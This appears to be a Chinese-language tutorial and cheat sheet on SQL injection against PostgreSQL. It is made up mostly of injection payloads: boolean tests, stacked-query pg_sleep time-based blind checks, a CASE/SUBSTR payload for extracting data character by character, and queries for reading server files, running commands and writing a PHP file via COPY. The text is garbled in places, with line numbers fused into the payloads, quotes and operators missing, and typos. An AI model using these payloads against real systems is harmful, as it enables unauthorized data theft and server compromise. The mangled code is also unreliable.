关于PostgreSQL的SQL注入必知必会 .docVIP

挖洞的土拨鼠 我的GitHub: /cisp我的博客: /KevinGeorge/ 关于PostgreSQL的SQL注入必知必会 一、postgresql简介 postgresql是一款关系型数据库，广泛应用在web编程当中，由于其语法与MySQL不尽相同，所以其SQL注入又自成一派。 二、postgresql的SQL注入：（注意注释符号--+） 1、简单的有回显的SQL注入不用多说，还是基本的SQL语句直接查询就可以了。 1 #简单的payload2 parameter = 2-13 parameter = 1 and 1 = 24 parameter = 1 or 1 = 2-15 parameter = 1 and 1=1#and - or6 parameter = 1 and 1=2#and - or 或者引号区分发（适用于字符串） 1 parameter = 1 #Success2 parameter = 1 #Failed3 parameter = 1 #Success 2、一般的基于时间的盲注，可以参考下面的办法： 1 #postgresql 的几个简单判断payload：2 parameter=1;select pg_sleep(5)3 parameter=1;select pg_sleep(5)4 parameter=1);select pg_sleep(5)5 parameter=1);select pg_sleep(5)6 parameter=1));select pg_sleep(5)7 parameter=select pg_sleep(5) 盲注的逐位猜解 1 SELECT CASE WHEN (COALESCE(ASCII(SUBSTR(({current_user}),1,1)),0) 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1--+ 3、常见的函数查看一些基本信息： 1 SELECT version() #查看版本信息2 #查看用户3 SELECT user;4 SELECT current_user;5 SELECT session_user;6 SELECT usename FROM pg_user;#这里是usename不是username7 SELECT getpgusername();8 #查看当前数据库9 SELECT current_database() 4、postgresql下的if 1 #mysql的2 if(expr1,result1,result2);3 #如果expr1满足，result1，否则result24 5 #对于postgresql6 select case when(expr1) then result1 else result2 end;7 8 #举个例子9 select casr when(current_user=postgres) then pg_sleep(5) else pg_sleep(0) end; 5、其他 （1）读取文件： 1 select pg_read_file(filepath+filename); （2）执行命令: 1 select system(comamnd_string); （3）写入文件： 1 COPY (select ?php phpinfo();?) to /tmp/1.php;